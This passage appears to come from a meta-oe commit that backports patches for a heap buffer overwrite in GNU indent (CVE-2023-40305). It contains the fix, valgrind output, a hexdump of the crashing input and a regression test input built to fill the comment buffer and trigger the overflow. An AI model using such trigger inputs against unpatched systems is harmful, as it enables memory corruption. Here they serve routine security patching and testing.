++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ */ ++ x +diff --git a/src/indent.c b/src/indent.c +index 0c2780b..208b48a 100644 +--- a/src/indent.c ++++ b/src/indent.c +@@ -145,8 +145,8 @@ static void sw_buffer(void) + parser_state_tos->search_brace = false; + bp_save = buf_ptr; + be_save = buf_end; +- buf_ptr = save_com.ptr; + need_chars (&save_com, 1); ++ buf_ptr = save_com.ptr; + buf_end = save_com.end; + save_com.end = save_com.ptr; /* make save_com empty */ + } +-- +2.35.5 diff --git a/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch new file mode 100644 index 0000000000..d02521bb06 --- /dev/null +++ b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0002.patch @@ -0,0 +1,4254 @@ +From 2685cc0bef0200733b634932ea7399b6cf91b6d7 Mon Sep 17 00:00:00 2001 +From: Petr Písař <ppisar@redhat.com> +Date: Thu, 19 Oct 2023 08:42:59 +0000 +Subject: [PATCH] Fix a heap buffer overwrite in search_brace() + (CVE-2023-40305) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If there was a comment between if-condition and an statement opening +bracket and the comment size aligned to an indent-internal 1024 B +buffer for comments, indent attempted to write into a nonallocated +memory on heap. + +$ hexdump -C /tmp/write1 +00000000 69 66 20 30 3b 65 6c 73 65 2f 2a 0a 0a 0a 0a 0a |if 0;else/*.....| +00000010 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a |................| +* +00000800 0a 0a 0a 0a 2a 2f 7b 0a |....*/{.| +00000808 + +$ valgrind -- ./indent -o /dev/null /tmp/write1 2>&1 | head -n 23 +==26345== Memcheck, a memory error detector +==26345== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al. +==26345== Using Valgrind-3.21.0 and LibVEX; rerun with -h for copyright info +==26345== Command: ./indent -o /dev/null /tmp/write1 +==26345== +==26345== Invalid write of size 1 +==26345== at 0x401558: search_brace (indent.c:232) +==26345== by 0x401CB2: indent_main_loop (indent.c:548) +==26345== by 0x402288: indent (indent.c:758) +==26345== by 0x402931: indent_single_file (indent.c:1003) +==26345== by 0x4029FF: indent_all (indent.c:1041) +==26345== by 0x402BA6: main (indent.c:1122) +==26345== Address 0x4aa7830 is 0 bytes after a block of size 2,048 alloc'd +==26345== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==26345== by 0x408BA1: xrealloc (globs.c:64) +==26345== by 0x40BEE4: need_chars (handletoken.c:89) +==26345== by 0x401686: search_brace (indent.c:281) +==26345== by 0x401CB2: indent_main_loop (indent.c:548) +==26345== by 0x402288: indent (indent.c:758) +==26345== by 0x402931: indent_single_file (indent.c:1003) +==26345== by 0x4029FF: indent_all (indent.c:1041) +==26345== by 0x402BA6: main (indent.c:1122) + +The cause was that the buffer was exhausted by the comment text and no +space left for the following new-line and curly bracket characters. + +This patch fixes it by enlarging the buffer two fit these two +additional characters. + +<https://savannah.gnu.org/bugs/index.php?64503> + +Signed-off-by: Petr Písař <ppisar@redhat.com> + +CVE: CVE-2023-40305 + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/indent.git/commit/?id=2685cc0bef0200733b634932ea7399b6cf91b6d7] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + regression/TEST | 44 +- + regression/input/comment-heap-overwrite.c | 2042 ++++++++++++++++ + regression/standard/comment-heap-overwrite.c | 2044 +++++++++++++++++ + .../standard/comment-heap-overwrite.err | 1 + + src/indent.c | 1 + + 5 files changed, 4111 insertions(+), 21 deletions(-) + create mode 100644 regression/input/comment-heap-overwrite.c + create mode 100644 regression/standard/comment-heap-overwrite.c + create mode 100644 regression/standard/comment-heap-overwrite.err + +diff --git a/regression/TEST b/regression/TEST +index a7a6747..a76c112 100755 +--- a/regression/TEST ++++ b/regression/TEST +@@ -427,6 +427,7 @@ echo Testing new comment stuff...Done. + + + echo Testing bad code handling.... ++ERR=output/errors + + # print_comment() was reading past the end of the buffer... + echo -ne '/*' | $INDENT -npro -st > /dev/null 2>&1 +@@ -444,29 +445,30 @@ then + echo >> $ERR + fi + +-# This ends in a error from indent but it shouldn't coredump. +-$INDENT -npro input/bug206785.c -o output/bug206785.c 2>output/bug206785.err ++# This ends in an error from indent but it shouldn't coredump. ++for TEST in bug206785 comment-heap-overwrite; do ++ $INDENT -npro input/"$TEST".c -o output/"$TEST".c 2>output/"$TEST".err + +-if [ $? -ne 2 ] +-then +- printf ERROR: bad return status from indent. | tee -a $ERR +- echo >> $ERR +-fi +-cd output ++ if [ $? -ne 2 ] ++ then ++ printf "ERROR: bad return status from indent for %s.c" "$TEST" | tee -a $ERR ++ echo >> $ERR ++ fi + +-for i in bug206785.c bug206785.err +-do +- printf ...$i... +- diff --initial-tab ../standard/$i $i > $i-diffs 2>&1 +- if [ -s $i-diffs ] +- then +- printf ERROR: $i failed | tee -a $ERR +- echo >> $ERR +- else +- rm $i-diffs +- rm $i +- fi +- echo ++ for i in "$TEST".c "$TEST".err ++ do ++ printf "...%s..." "$i" ++ diff --initial-tab standard/"$i" output/"$i" > output/"$i"-diffs 2>&1 ++ if [ -s output/"$i"-diffs ] ++ then ++ printf "ERROR: %s failed" "$i" | tee -a $ERR ++ echo >> $ERR ++ else ++ rm output/"$i"-diffs ++ rm output/"$i" ++ fi ++ echo ++ done + done + + echo Testing bad code handling...Done. +diff --git a/regression/input/comment-heap-overwrite.c b/regression/input/comment-heap-overwrite.c +new file mode 100644 +index 0000000..5b1ca6a +--- /dev/null ++++ b/regression/input/comment-heap-overwrite.c +@@ -0,0 +1,2042 @@ ++if 0;else/* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++*/{ +diff --git a/regression/standard/comment-heap-overwrite.c b/regression/standard/comment-heap-overwrite.c +new file mode 100644 +index 0000000..8650d51 +--- /dev/null ++++ b/regression/standard/comment-heap-overwrite.c +@@ -0,0 +1,2044 @@ ++if 0; ++else /* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 